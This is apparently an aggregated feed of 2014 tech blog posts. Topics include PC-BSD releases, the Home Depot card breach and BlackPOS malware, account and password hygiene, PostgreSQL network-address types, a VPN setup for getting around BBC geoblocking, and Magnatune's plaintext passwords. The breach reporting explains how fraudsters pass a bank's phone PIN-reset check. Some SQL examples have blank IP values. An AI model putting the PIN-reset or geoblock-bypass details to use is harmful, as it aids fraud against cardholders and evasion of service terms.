Essentially, what I'd like is for Audible to let me sideload some content (the few books I did not buy from them, and the News Quiz series that I stitch together from the podcast) and create a playlist; then as far as I'm concerned I wouldn't have to use an iPod at all. Well, besides the fact that I'd have to find a way to shut up notifications while playing audiobooks. Having Dragons of Autumn Twilight interrupted by a Facebook notification pop is not something I look forward to. And in some cases I have even had a background update disrupt my playback, so there is definitely space for improvement.

PC-BSD at Fossetcon Official PC-BSD Blog | 2014-09-09 15:13 UTC

Fossetcon will take place September 11–13 at the Rosen Plaza Hotel in Orlando, FL. Registration for this event ranges from $10 to $85 and includes meals and a t-shirt.

There will be a BSD booth in the expo area on both Friday and Saturday from 10:30–18:30. As usual, we’ll be giving out a bunch of cool swag, PC-BSD DVDs, and FreeNAS CDs, as well as accepting donations for the FreeBSD Foundation. Dru Lavigne will present “ZFS 101” at 11:30 on Saturday. The BSDA certification exam will be held at 15:00 on Saturday.

Nearly a week after this blog first reported signs that Home Depot was battling a major security incident, the company has acknowledged that it suffered a credit and debit card breach involving its U.S. and Canadian stores dating back to April 2014. Home Depot was quick to assure customers and banks that no debit card PIN data was compromised in the break-in. Nevertheless, multiple financial institutions contacted by this publication are reporting a steep increase over the past few days in fraudulent ATM withdrawals on customer accounts.

The card data for sale in the underground that was stolen from Home Depot shoppers allows thieves to create counterfeit copies of debit and credit cards that can be used to purchase merchandise in big box stores. But if the crooks who buy stolen debit cards also are able to change the PIN on those accounts, the fabricated debit cards can then be used to withdraw cash from ATMs.

Experts say the thieves who are perpetrating the debit card fraud are capitalizing on a glut of card information stolen from Home Depot customers and being sold in cybercrime shops online. Those same crooks also are taking advantage of weak authentication methods in the automated phone systems that many banks use to allow customers to reset the PINs on their cards.

Here’s the critical part: The card data stolen from Home Depot customers and now for sale on the crime shop Rescator[dot]cc includes both the information needed to fabricate counterfeit cards as well as the legitimate cardholder’s full name and the city, state and ZIP of the Home Depot store from which the card was stolen (presumably by malware installed on some part of the retailer’s network, and probably on each point-of-sale device).

This is especially helpful for fraudsters since most Home Depot transactions are likely to occur in the same or nearby ZIP code as the cardholder. The ZIP code data of the store is important because it allows the bad guys to quickly and more accurately locate the Social Security number and date of birth of cardholders using criminal services in the underground that sell this information.

Why do the thieves need Social Security and date of birth information? Countless banks in the United States let customers change their PINs with a simple telephone call, using an automated call-in system known as a Voice Response Unit (VRU). A large number of these VRU systems allow the caller to change their PIN provided they pass three out of five security checks. One is that the system checks to see if the call is coming from a phone number on file for that customer. It also requests the following four pieces of information:

-the 3-digit code (known as a card verification value or CVV/CV2) printed on the back of the debit card;
-the card’s expiration date;
-the customer’s date of birth;
-the last four digits of the customer’s Social Security number.
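The weakness of that policy is easy to see in code. A toy sketch (the factor names are invented for illustration, not any bank's real system) of the "three out of five" check described above:

```python
# Illustrative only: a 3-of-5 knowledge-based check like the VRU policy above.

def vru_allows_pin_reset(checks_passed: dict) -> bool:
    """checks_passed maps factor name -> whether the caller supplied it correctly."""
    return sum(checks_passed.values()) >= 3

# A fraudster holding a stolen card dump plus an underground SSN/DOB lookup
# can typically supply the expiration date, date of birth, and SSN last-four,
# without ever having the CVV2 or calling from the phone number on file:
fraudster = {
    "caller_id_on_file": False,
    "cvv2": False,
    "expiration_date": True,
    "date_of_birth": True,
    "ssn_last_four": True,
}
print(vru_allows_pin_reset(fraudster))  # three correct factors are enough
```

Requiring all five factors, as some of the banks below ended up doing, turns the same function into `== 5` and closes this particular hole.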

On Thursday, I spoke with a fraud fighter at a bank in New England that experienced more than $25,000 in PIN debit fraud at ATMs in Canada. The bank employee said thieves were able to change the PINs on the cards using the bank’s automated VRU system. In this attack, the fraudsters were calling from disposable, prepaid Magic Jack telephone numbers, and they did not have the CVV2 for each card. But they were able to supply the other three data points.

KrebsOnSecurity also heard from an employee at a much larger bank on the West Coast that lost more than $300,000 in two hours today to PIN fraud on multiple debit cards that had all been used recently at Home Depot. The manager said the bad guys called the customer service folks at the bank and provided the last four of each cardholder’s Social Security number, date of birth, and the expiration date on the card. And, as with the bank in New England, that was enough information for the bank to reset the customer’s PIN.

The fraud manager said the scammers in this case also told the customer service people they were traveling in Italy, which made two things possible: It raised the withdrawal limits on the debit cards and allowed thieves to withdraw $300,000 in cash from Italian ATMs in the span of less than 120 minutes.

One way that banks can decrease the incidence of PIN reset fraud is to require that callers supply all of the requested information accurately, and indeed the bank employee I heard from in New England said a nearby financial institution she’d contacted that used the same VRU system saw its PIN fraud drop to zero when it began requiring that all questions be correctly answered. The bank on the West Coast that I interviewed also said it had already begun requiring all five elements before processing PIN changes on any cards that have been used at Home Depot since April.

Still, some of the world’s largest banks have begun moving away from so-called knowledge-based authentication for their VRU systems toward more robust technologies, such as voice biometrics and phone printing, said Avivah Litan, a fraud analyst with Gartner Inc.

“We saw this same activity in the wake of the breach at Target, where the thieves would call in and use the VRUs to check balances, remove blocks on cards, get the payment history and of course change PINs,” Litan said.

Voice biometric technologies create an index of voice fingerprints both for customers and various fraudsters who conduct VRU fraud, but Litan said fraudsters often will use voice synthesizers to defeat this layer of detection.

Phone printing profiles good and bad callers alike, building fingerprints based on dozens of call characteristics, including packet loss, dropped frames, noise, call clarity, phone type and a host of other far more geeky concepts (e.g., “quantization,” and “taggers“).


The fact that it is still possible to use customer service or an automated system to change someone else’s PIN with just the cardholder’s Social Security number, birthday and the expiration date of their stolen card is remarkable, and suggests that most banks remain clueless or willfully blind to the sophistication of identity theft services offered in the cybercrime underground. I know of at least two very popular and long-running cybercrime stores that sell this information for a few dollars apiece. One of them even advertises the sale of this information on more than 300 million Americans.

Banks are long overdue to move away from knowledge-based authentication. Forget about the fact that most major providers of these services have been shown to be compromised in the past year by the very crooks selling Social Security numbers and other data to identity thieves: The sad truth is that today’s cybercriminals are more likely to know the correct answers to these questions than you are.

I bring this up mainly because Home Depot is, predictably, offering credit monitoring services to affected customers (which, given the length of this breach is likely to impact a significant chunk of the American population). Credit and debit card fraud is annoying and inconvenient and can be at least temporarily expensive for victims, but as long as you are keeping a close eye on your monthly statements and reporting any unauthorized charges immediately, you will not be on the hook for those charges.

Please note that credit monitoring services will not help with this task, as they are not designed to look for fraud on existing accounts tied to your name and personal information. As I’ve noted in several stories, credit monitoring services are of dubious value because although they may alert you when thieves open new lines of credit in your name, those services do not prevent that activity. The one thing these services are good for is in helping identity theft victims clean up the mess and repair their good name.

However, given the fact that your Social Security number, date of birth and every possible answer to all of these knowledge-based authentication questions can be had for $25 in order to establish new lines of credit in your name, it makes good sense for people to avail themselves of free credit monitoring services. But there is little reason to pay for these services. If you don’t already have a credit monitoring service for free then maybe you haven’t been paying close enough attention to the dozens of companies over the past year that have likely lost your data in a breach and are already offering these services for free.

For more information about the benefits and limits of credit monitoring services — as well as other helpful tips to proactively safeguard your credit file — see this story.

More information, including an FAQ about the breach, released by Home Depot is available at this link.

The PC-BSD team is pleased to announce the availability of the next PC-BSD quarterly package update, version 10.0.3!

This update includes a number of important bug-fixes, as well as newer packages and desktops, such as Chromium 37.0.2062.94, Cinnamon 2.2.14, Lumina 0.6.2, and more. This release also includes a CD-sized ISO of TrueOS, for users who want to install a server without X. For more details and updating instructions, refer to the notes below.

We are already hard at work on the next major release of PC-BSD, 10.1, due later this fall, which will include FreeBSD 10.1-RELEASE under the hood. Users interested in following along with development should sign up for our Testing mailing list.

PC-BSD Notable Changes

* Cinnamon 2.2.14
* Chromium 37.0.2062.94
* NVIDIA Driver 340.24
* Lumina desktop 0.6.2-beta
* Pkg 1.3.7
* Various fixes to the Appcafe Qt UI
* Bugfixes to Warden / jail creation
* Fixed a bug with USB media not always being bootable
* Fixed several issues with Xorg setup
* Improved Boot-Environments to allow “beadm activate” to set default
* Support for jail “bulk” creation via Warden
* Fixes for relative ZFS dataset mount-point creation via Warden
* Support for full-disk (GELI) encryption without an unencrypted /boot partition


Along with our traditional PC-BSD DVD ISO image, we have also created a CD-sized ISO image of TrueOS, our server edition.

This is a text-based installer which includes FreeBSD 10.0-RELEASE under the hood. It includes the following features:

* ZFS on Root installation
* Boot-Environment support
* Command-Line versions of PC-BSD utilities, such as Warden, Life-Preserver and more.
* Support for full-disk (GELI) encryption without an unencrypted /boot partition

We have some additional features in the works for 10.1 and later; stay tuned this fall for more information.


Due to some changes with how pkgng works, it is recommended that all users update via the command-line using the following steps:

# pkg update -f
# pkg upgrade pkg
# pkg update -f
# pkg upgrade
# pc-extractoverlay ports
# reboot

PKGNG may need to re-install many of your packages to fix an issue with shared library version detection. If you run into issues doing this, or have conflicts, please open a bug report with the output of the above commands.

If you run into shared library issues running programs after upgrading, you may need to do a full-upgrade with the following:

# pkg upgrade -f

Getting media

10.0.3 DVD/USB media can be downloaded from this URL via HTTP or Torrent.

Reporting Bugs
Found a bug in 10.0.3? Please report it (with as much detail as possible) to our new RedMine Database.

The apparent credit and debit card breach uncovered last week at Home Depot was aided in part by a new variant of the malicious software program that stole card account data from cash registers at Target last December, according to sources close to the investigation.

Photo: Nicholas Eckhart
On Tuesday, KrebsOnSecurity broke the news that Home Depot was working with law enforcement to investigate “unusual activity” after multiple banks said they’d traced a pattern of card fraud back to debit and credit cards that had all been used at Home Depot locations since May of this year.

A source close to the investigation told this author that an analysis revealed at least some of Home Depot’s store registers had been infected with a new variant of “BlackPOS” (a.k.a. “Kaptoxa”), a malware strain designed to siphon data from cards when they are swiped at infected point-of-sale systems running Microsoft Windows.

The information on the malware adds another indicator that those responsible for the as-yet unconfirmed breach at Home Depot also were involved in the December 2013 attack on Target that exposed 40 million customer debit and credit card accounts. BlackPOS also was found on point-of-sale systems at Target last year. What’s more, cards apparently stolen from Home Depot shoppers first turned up for sale on Rescator[dot]cc, the same underground cybercrime shop that sold millions of cards stolen in the Target attack.

Clues buried within this newer version of BlackPOS support the theory put forth by multiple banks that the Home Depot breach may involve compromised store transactions going back at least several months. In addition, the cybercrime shop Rescator over the past few days pushed out nine more large batches of stolen cards onto his shop, all under the same “American Sanctions” label assigned to the first two batches of cards that originally tipped off banks to a pattern of card fraud that traced back to Home Depot. Likewise, the cards lifted from Target were sold in several dozen batches released over a period of three months on Rescator’s shop.

The cybercrime shop Rescator[dot]cc pushed out nine new batches of cards from the same “American Sanctions” base of cards that banks traced back to Home Depot.
POWERFUL ENEMIES The tip from a source about BlackPOS infections found at Home Depot comes amid reports from several security firms about the discovery of a new version of BlackPOS. On Aug. 29, Trend Micro published a blog post stating that it had identified a brand new variant of BlackPOS in the wild that was targeting retail accounts. Trend said the updated version, which it first spotted on Aug. 22, sports a few notable new features, including an enhanced capability to capture card data from the physical memory of infected point-of-sale devices. Trend said the new version also has a feature that disguises the malware as a component of the antivirus product running on the system.

Contents of the new BlackPOS component responsible for exfiltrating stolen cards from the network. Source: Trend Micro.

Trend notes that the new BlackPOS variant uses a similar method to offload stolen card data as the version used in the attack on Target.

“In one the biggest data breach[es] we’ve seen in 2013, the cybercriminals behind it offloaded the gathered data to a compromised server first while a different malware running on the compromised server uploaded it to the FTP,” wrote Trend’s Rhena Inocencio. “We surmise that this new BlackPOS malware uses the same exfiltration tactic.”

An Internet search on the unique malware “hash” signature noted in Trend’s malware writeup indicates that the new BlackPOS version was created on June 22, 2014, and that as late as Aug. 15, 2014 only one of more than two dozen anti-malware tools (McAfee) detected it as malicious.


Other clues in the new BlackPOS malware variant further suggest a link between the cybercrooks behind the apparent breach at Home Depot and the hackers who hit Target. The new BlackPOS variant includes several interesting text strings. Among those are five links to Web sites featuring content about America’s role in foreign conflicts, particularly in Libya and Ukraine.

One of the images linked to in the guts of the BlackPOS code.
Three of the links point to news, editorial articles and cartoons that accuse the United States of fomenting war and unrest in the name of Democracy in Ukraine, Syria, Egypt and Libya. One of the images shows four Molotov cocktails with the flags of those four nations on the bottles, next to a box of matches festooned with the American flag and match ready to strike. Another link leads to an image of the current armed conflict in Ukraine between Ukrainian forces and pro-Russian separatists.

This is interesting given what we know about Rescator, the individual principally responsible for running the store that is selling all of these stolen credit and debit cards. In the wake of the Target breach, I traced a long list of clues from Rescator’s various online identities back to a young programmer in Odessa, Ukraine. In his many personas, Rescator identified himself as a member of the Lampeduza cybercrime forum, and indeed this site is where he alerts customers about new batches of stolen cards.

As I discovered in my profile of Rescator, he and his crew seemed somewhat taken with the late despotic Libyan leader Muammar Gaddafi, although they prefer the phonetic spelling of his name. The Web site kaddafi[dot]hk was among four main carding shops run by Rescator’s crew (it has since been retired and merged with Rescator[dot]cc). The domain kaddafi[dot]me was set up to serve as an instant message Jabber server for cybercrooks, advertising its lack of logging and record keeping as a reason crooks should trust kaddafi[dot]me to handle their private online communications.

When I reached out to Rescator last December to obtain comment about my findings on his apparent role in the Target break-in, I received an instant message reply from the Jabber address “kaddafi@kaddafi[dot]me” (in that conversation, the person chatting with me from that address offered to pay me $10,000 if I did not run that story; I declined). But I also discovered that the kaddafi[dot]me domain was a blog of sorts that hosted some harsh and frankly chilling anti-American propaganda.

The entire three-part manifesto posted on the kaddafi[dot]me home page is no longer available, but a professionally translated snippet of this tirade reads:

“The movement of our Republic, the ideology of Lampeduza – is the opposition to Western countries, primarily targeting the restoration of the balance of forces in the world. After the collapse of the USSR, we have lost this fragile equilibrium face of the planet. We – the Senate and the top people of the Republic are not just fighting for survival and our place under the sun, we are driven by the idea! The idea, which is ​​living in all of us – to return all that was stolen and taken from our friendly countries grain by grain! We are fighting for a good cause! Hot blood is flowing in us, in citizens, who want to change situation in the world. We do not bend to other people’s opinions and desires, and give an adequate response to the Western globalism. It is essential to be a fighter for justice!

Perhaps we would be living completely differently now, if there had not been the plan of Allen Dulles, and if America had not invested billions in the collapse of the USSR. We were deprived of a common homeland, but not deprived of unity, have found our borders, and are even closer to each other. We saw the obvious principles of capitalism, where man to a man is a wolf [[see here for more context on this metaphor]]. Together, we can do a lot to bring back all the things that we have been deprived of because of America! We will be heard!

Citizens of Lampeduza – “free painters” ready to create and live the idea for the good of the Motherland — let’s first bend them over, and then insert deeper!!!

Google-translated version of Kaddafi[dot]me homepage.

Account churn Flameeyes's Weblog | 2014-09-07 14:30 UTC

In my latest post I singled out one of the worst security experiences I've had with a service, but that is by far not the only bad experience I've had. Indeed, given that I've been actively hunting down my old accounts and trying to get my hands on them, I can tell you that I have plenty of material to fill books with bad examples.

First of all, there is the problem of migrating email addresses. For the longest time I've been using my GMail address to register everywhere, but then I decided to migrate to my own domain (especially since Gandi supports two-factor authentication, which makes it much safer). Unfortunately, that means that not only do I have a bunch of accounts still on the old email address, but I also have duplicate accounts.

Duplicate accounts become even trickier when you consider that I had my own company, which meant double accounts for services that did not allow a single account to order sometimes with a VAT ID attached and sometimes without. Sometimes I could close the accounts (once I dropped the VAT ID), and sometimes I couldn't, so a good deal of them are still out there.

Finally, there are the services that are available in multiple countries but with country-specific accounts. Which, don't be mistaken, does not mean that every country has its own account database! It simply means that a given account is assigned to a country and does not work in any other. In most cases you cannot even migrate your account across countries. This is the case, for instance, of OVH (and why I moved to Gandi), but also of PayPal (in which the billing address is tied to the country of the account and can't be changed), IKEA and -PSN- Sony Online Entertainment. The end result is that I have duplicated (or even triplicated) accounts to cover the fact that I have lived in multiple countries by now.

Also, it turns out that I completely forgot how many services I registered to over the years. Yes I have the passwords as stored by Chrome, but that’s not a comprehensive list as some of the most critical passwords have never been saved there (such as my bank’s password), plus some websites I have never used in Chrome, and at some point I had it clean the history of passwords and start from scratch. Some of the passwords have been saved in sgeps so I could look them up there, but even those are not a complete list. I ended up looking in my old email content to figure out which accounts I forgot having. The results have been fun.

But what about the grievances? Some of the accounts I wanted to regain access to ended up being blocked or deleted, and I'm surprised by the number of services that were either killed or moved around. At least three ebook stores I used are now gone, two of them absorbed by Kobo, while Marks & Spencer refused to recognize my email as valid; I assume they reset their user database at some point. Some of the hotel loyalty programs I signed up for and used once or twice disappeared, or were renamed or merged into something else. Not a huge deal, but it makes account management a fun problem.

Then there are the accounts that had their password invalidated in the meantime, so even if I have a copy of it, it's useless. Given that I had not logged into some accounts for years, that's fair enough: between leaks, Heartbleed, and the overdue changes in best practices for password storage, I am more bothered by the services that did not invalidate my password in the meantime. But then again, there are different ways to deal with it. Some services, when you try to log in with the previous password, point out that it's no longer valid and proceed with the same forgotten-password workflow. Others will send you the password by email in plain text.

One quite egregious case happened with an Italian electronics shop, one of the first online-only stores I know of in Italy. Somehow, I knew that the account was still active, mostly because I could see their newsletter in the spam folder of my GMail account. So I went and asked for the password back, to change the address and stop the newsletter too (given I don't live in Italy any longer), and they sent me back the user ID and password in cleartext. They had reset their passwords in the meantime, and the default password became my Italian tax ID. Not very safe: if I were to know anyone else's user ID, knowing their tax ID is easy, as it can be calculated from a few personal, but not so secret, details (full name, sex, date and city of birth).

But there is something worse than unannounced password resets. The dance of generating a new password. I have now the impression that it’s a minority of services that actually allow you to use whichever password you want. Lots of the services I have changed password for between last night and today required me to disable the non-alphanumeric symbols, because either they don’t support any non-alphanumeric character, or they only support a subset that LastPass does not let you select.

But this is not as bothersome as the length limitation of passwords. Most sites will be happy to tell you that they require a minimum of 6 or 8 characters for your password — few will tell you upfront the maximum length of a password. And very few of those that won’t tell you right away will fix the mistake by telling you when the password is too long, how long it can be. I even found sites that simply error out on you when you try to use a password that is not valid, and decide to invalidate both your old and temporary passwords, while not accepting the new one. It’s a serious pain.

Finally, I’ve enabled 2FA for as many services as I could; some of it is particularly bothersome (LinkedIn, I’ll probably write more about that), but at least it’s an extra safety net. Unfortunately, I still find it extremely bothersome that neither Google Authenticator nor Red Hat's FreeOTP (last time I tried) supported backing up the private keys of the configured OTPs. Since I switched between three phones in the past three months (I upgraded my phone, then had to downgrade because I broke the screen of the new one), I could use some help when having to re-enroll my OTP generators.

Yesterday I made the bold claim that there are technical reasons for preferring PostgreSQL over MySQL or MariaDB. Today I would like to try to back that up with an example from actual practice. For this I have picked out PostgreSQL’s ability to deal with network addresses.

As an example of a practical application, consider a database-backed blacklist used e.g. by a proxy, spam filter or similar. For the querying application, the only question is whether an IP address is blocked by the blacklist or not. However, it should be possible to define not only individual hosts in the blacklist, but also network segments (e.g. or 2001:db8::/64).

The Elephant

PostgreSQL ships with two native data types for IP addresses, inet and cidr. The former is the more flexible of the two and can handle both networks and hosts. Especially useful are the accompanying operators; in particular, the containment operators <<, <<=, >> and >>= make the task at hand child’s play.

A suitable table with a sequential numeric ID, a description and a timestamp can be created in PostgreSQL with the following SQL statement:

CREATE TABLE acl_blacklist (  
    id serial PRIMARY KEY,
    ip inet,
    description character varying(255),
    created timestamp with time zone DEFAULT LOCALTIMESTAMP
);
To play around with the blacklist a little, we insert two example networks and one host:

INSERT INTO acl_blacklist (ip, description) VALUES  
    ('', 'My evil IPv4 net'),
    ('2001:db8::/64', 'My evil IPv6 net'),
    ('', 'My evil IPv4 host');
A dump of the table now looks like this:

 id |       ip       |    description    |            created            
----+----------------+-------------------+-------------------------------
  1 |                | My evil IPv4 net  | 2014-09-07 13:36:28.718252+02
  2 | 2001:db8::/64  | My evil IPv6 net  | 2014-09-07 13:36:28.718252+02
  3 |                | My evil IPv4 host | 2014-09-07 13:36:28.718252+02
Whether an IP address is blocked by the blacklist or not can be determined with a short SQL statement:

SELECT 1 FROM acl_blacklist WHERE '' <<= acl_blacklist.ip;  
This query returns the following result:

(1 row)
With an IP address that is not blocked by the blacklist (e.g. the result looks like this:

(0 rows)
This works with IPv6 addresses too, of course:

SELECT 1 FROM acl_blacklist WHERE '2001:db8::5' <<= acl_blacklist.ip;  
(1 row)
SELECT 1 FROM acl_blacklist WHERE '2001:db8:1::5' <<= acl_blacklist.ip;  
(0 rows)

The Dolphin

MySQL does not come with a native data type for IP addresses. With the help of built-in functions, a workaround can nevertheless be built that offers functionality comparable to PostgreSQL’s. However, the check has to be performed separately for IPv4 and IPv6; the example is therefore limited to IPv4.

Analogous to PostgreSQL, a blacklist table is created first:

CREATE TABLE `acl_blacklist` (  
    `id` serial PRIMARY KEY,
    `ip` varchar(16) NOT NULL,
    `mask` tinyint(3) unsigned NOT NULL,
    `description` varchar(255) NOT NULL,
    `created` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP
);
IP address and netmask are stored in separate fields here. This way, the INET_ATON function can later be used to obtain a query result comparable to PostgreSQL’s.

Again, we insert a host and a network into the table for testing purposes:

INSERT INTO `acl_blacklist` (`ip`, `mask`, `description`) VALUES  
    ('', 24, 'My evil IPv4 net'),
    ('', 32, 'My evil IPv4 host');
The table now looks as follows:

+----+-------------+------+-------------------+---------------------+
| id | ip          | mask | description       | created             |
+----+-------------+------+-------------------+---------------------+
|  1 |             |   24 | My evil IPv4 net  | 2014-09-07 14:15:21 |
|  2 |             |   32 | My evil IPv4 host | 2014-09-07 14:15:21 |
+----+-------------+------+-------------------+---------------------+
So far, the differences from PostgreSQL are limited. The query to check whether an IP is blocked by the blacklist, however, turns out to be considerably more complex than under PostgreSQL:

SELECT 1 FROM `acl_blacklist` WHERE  
    SUBSTRING(LPAD(BIN(INET_ATON('')), 32, '0'), 1, `acl_blacklist`.`mask`) = 
    SUBSTRING(LPAD(BIN(INET_ATON(`acl_blacklist`.`ip`)), 32, '0'), 1, `acl_blacklist`.`mask`);
The result looks exactly the same as under PostgreSQL (format specifics of the respective command line interfaces aside):

+---+
| 1 |
+---+
| 1 |
+---+
1 row in set (0.00 sec)  
With an IP address that is not blocked by the blacklist (e.g. the result looks like this:

Empty set (0.00 sec)  
IPv6 support could be added, by the way, by extending the WHERE condition with an OR clause using the IPv6-specific function INET6_ATON. In addition, the data field for the IP address would then have to be sized accordingly.
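The bit-prefix comparison those nested functions perform can also be sketched outside SQL. Here is a minimal shell version; the helper names are hypothetical and the addresses come from the 192.0.2.0/24 documentation range, not from the elided examples above:

```shell
#!/bin/sh
# ip2int: dotted-quad IPv4 address -> 32-bit integer,
# the same conversion that INET_ATON performs.
ip2int() {
    oldIFS=$IFS; IFS=.
    set -- $1
    IFS=$oldIFS
    echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
}

# in_net ADDRESS NETWORK MASKLEN: true when the top MASKLEN bits match,
# mirroring the SUBSTRING(LPAD(BIN(...))) prefix comparison in the query.
in_net() {
    ip=$(ip2int "$1")
    net=$(ip2int "$2")
    [ $(( ip >> (32 - $3) )) -eq $(( net >> (32 - $3) )) ]
}

in_net 192.0.2.99 192.0.2.0 24 && echo "blocked"
in_net 198.51.100.1 192.0.2.0 24 || echo "not blocked"
```

The SQL variant compares binary strings character by character instead of shifting integers, but the effect is identical: host bits are ignored, prefix bits must match.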


At least in this discipline, the elephant beats the dolphin: not only in terms of complexity and manageability, but interestingly also in query performance. The reason is probably that the operators in PostgreSQL are backed by a fast, internal implementation, while the nested function calls in MySQL inevitably lead to a performance penalty.

Bypassing Geolocation … | 2014-09-07 00:42 UTC

By now we all know that it is pretty easy to bypass geolocation blocking with a web proxy or VPN service. After all, there are over 2 million Google results for “bbc vpn” … and I wanted to do just that to view a BBC show on privacy and the dark web.

I wanted to set this up as cheaply as possible but not use a service that I had to pay for a month since I only needed one hour. This requirement directed me towards a do-it-yourself solution with an hourly server in the UK. I also wanted reproducibility so that I could spin up a similar service again in the future.

My first attempt was to route my browser through a local SOCKS proxy via ssh tunneling, ssh -D 2001 user@uk-host.tld. That didn’t work because my home connection was not good enough to stream from BBC without incessant buffering.

Hmm, if this simple proxy won’t work, that strikes out many other ideas: I needed a way to use the BBC iPlayer Downloader to view content offline. Ok, but the software doesn’t have native proxy support (naturally). Maybe you could somehow use Tor and set the exit node to the UK? That seems like a poor/slow idea.

I ended up routing all my traffic through a personal OpenVPN server in London, then downloaded the show via the BBC software and watched it in HD offline. The goal was to provision the VPN as quickly as possible (time is money). A Linode StackScript is a user-defined script that runs at the first boot of your host. Surprisingly, no one had published one to install OpenVPN yet. So I did: “Debian 7.5 OpenVPN” – feel free to use it on the Linode service to boot up a VPN automatically. It takes about two minutes to boot, install, and configure OpenVPN this way. Then you download the ca.crt and client configuration from the newly provisioned server and import them into your client.

End result: it took 42 minutes for me to download a one-hour show. Since I shut down the VPN within an hour, I was charged the Linode minimum, $.015 USD. Though I recommend Linode (you can use my referral link if you want), this same concept applies to any provider that has a presence in the UK, like Digital Ocean, which charges $.007/hour.

Addendum: even though I abandoned my first attempt, I left the browser window open and it continued to download even after I was disconnected from my UK VPN. I guess BBC only checks your IP once and then hands you off to the Akamai CDN. Maybe you only need a VPN service for a few minutes?

I also donated money to a BBC-sponsored charity to offset some of my bandwidth usage and freeloading of a service that UK citizens have to pay for; I encourage you to do the same. For reference, the BBC costs a UK household $.02 USD in tax per hour. (source)

I have made a note of this in my previous post: Magnatune is terribly insecure. Those who follow me on Twitter or Google+ already got the full details, but I thought I would repeat them here, and add a few notes about it.

I remember Magnatune back in the days when I hung around #amarok and helped with small changes here and there, and bigger changes for xine itself. It was at the time often used as an example of a good DRM-less service. Indeed, it sold DRM-free music way before Apple decided to drop its own music DRM, and it’s still one of the few services selling lossless music (if we exclude Humble Bundle and the games OSTs).

But then again, this is not a license to have terrible security, which is what Magnatune has right now. After naming Magnatune in the aforementioned post, I realized that I had not given it a new, good password; it was instead still using one of the old passwords I used to use, which are insecure by themselves: a bit too short, possibly susceptible to dictionary attacks. I was not even sure whether it was the password I used by default on many services before, which is of course terrible, and which was most likely leaked at multiple points in time (at least my old Adobe account was involved in their big leak).

As I said before, I stopped using fixed passwords some time last year, and then decided to jump on LastPass when Heartbleed required me to change passwords almost everywhere. But it takes a while to change the passwords on all your accounts, especially when you forget about some accounts altogether, like the Magnatune one above.

So I went to the Magnatune website to change my password, but of course I had forgotten what the original was, so I decided to follow the procedure for forgotten passwords. The first problem appears here: it does not require me to know which email address I registered with; instead it asks me (alternatively) for a username, which is quite obvious (Flameeyes, what else? There are very few sites where I use different usernames, one of them being Tumblr, and that’s usually because Flameeyes is taken). When I type that in, it actually shows me, on the web page, the email address I’m registered with.

What? This is a basic privacy issue: if it weren’t that I don’t actually vary my email addresses much, an attacker could now find an otherwise private email address. Worse yet, by using the usernames available in previous dumps, it’s possible to map them to email addresses, too. Indeed, a quick check provided me with at least one email address of a friend of mine just by using her usual username; I already knew the email address, but that shouldn’t be a given.

Anyway, I got an email back from Magnatune just a moment later. The email contains the password in plain text, which indicates they store it that way; bad practice. A note about plain text passwords: there is no way to prove beyond any doubt that a service is hashing (or hashing and salting) user passwords, but you can definitely prove otherwise. If you receive your password back in plain text when you say you forgot it, then the service does not store hashed passwords. Conversely, even if the service sends you a password reset link instead, it may still be storing the plain text password. This is most definitely unfortunate.
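The asymmetry comes from hashes being one-way: a service that stores only a random salt plus the salted hash can still verify a login, but it can never mail the original password back. A minimal sketch, with hypothetical values (real systems would use a slow KDF rather than bare SHA-256):

```shell
#!/bin/sh
# What a service *should* store: a random salt plus the salted hash
# (illustrative values only).
salt='9f8e7d6c'
stored=$(printf '%s%s' "$salt" 'hunter2' | sha256sum | cut -d' ' -f1)

# Verifying a login attempt: hash the candidate with the same salt, compare.
candidate='hunter2'
attempt=$(printf '%s%s' "$salt" "$candidate" | sha256sum | cut -d' ' -f1)
[ "$attempt" = "$stored" ] && echo "password accepted"
```

Nothing in what is stored allows reconstructing 'hunter2', which is exactly why a plain-text reminder email is proof positive that no such scheme is in place.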

Up to here, things would be bad but not that uncommon, as the Plain Text Offenders site linked above shows, and I have indeed submitted a screenshot of the email to them. But there is one more thing you can find out from the email they sent. You may remember that some months ago I wrote about email security, and around the same time so did the official Google blog – for those who wonder, no, I had no idea that such a post was being written, and the similar timing was a complete coincidence – so what’s the status of Magnatune? Well, unfortunately it’s bleak, as they don’t encrypt mail in transit:

Received: from ([])
        by with ESMTP id h11si9367820pdl.64.2014.
        for <f********@*****.***>;
        Thu, 28 Aug 2014 15:47:42 -0700 (PDT)
If the sending server had spoken TLS to the GMail server (yes, it’s GMail in the address I censored), it would have shown something like (version=TLSv1.2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128), which is what appears in the comment messages I receive from my own blog.

Not encrypting email in transit means that anybody who could have sniffed the traffic coming out of Magnatune’s server would be able to access any of their customers’ accounts: they just need to snoop the email traffic and they can collect all the passwords. Luckily, the email server the email arrived from is hosted at a company I trust very much, as I’m their customer too.

So I tried logging in with my username and newly-reminded password; unfortunately my membership expired years ago, which means I get no access at all, so I can’t even change my password or my email address. Too bad. But it did allow me to figure out some more problems with Magnatune’s security situation.

When you try to log in, you get sent to a different website depending on which kind of membership you subscribe(d) to. In my case I got the download membership; when you go there, your browser presents you with a dialog requesting a username and password. It’s standard HTTP-based authentication. It’s not very common because it’s not really user friendly: the server can’t serve any content until the user either enters a correct username/password combination or decides they don’t know a valid one and cancels the dialog, in which case a final 401 error is reported and whatever content the server sent is displayed by the browser.

Besides the user-friendliness (or lack thereof), HTTP authentication can be tricky, too. There are two ways to provide authentication over HTTP, one being Basic and the other Digest; neither is very secure by default. Digest is partially usable, but suffers from a lack of authentication of the parties, making MitM attacks trivial, while Basic allows a sniffer to figure out username and password as they travel in plaintext over the wire. HTTP authentication is, though, fairly secure if you use it in conjunction with TLS. Indeed, for some of my systems I use HTTP authentication over an HTTPS connection, as it allows me to configure the authentication at the web server level without support from the application itself.
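To illustrate just how thin Basic’s protection is without TLS: the Authorization header is merely base64 of user:password, which anyone on the wire reverses instantly. A quick sketch with illustrative credentials (not from the site in question):

```shell
#!/bin/sh
# What the browser sends with Basic authentication:
# base64 is an encoding, not encryption -- it is trivially reversible.
cred=$(printf '%s' 'alice:hunter2' | base64)
echo "Authorization: Basic $cred"

# What a sniffer does with the captured header value:
printf '%s' "$cred" | base64 -d
```

Digest at least avoids sending the password itself, but without TLS neither scheme protects the session.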

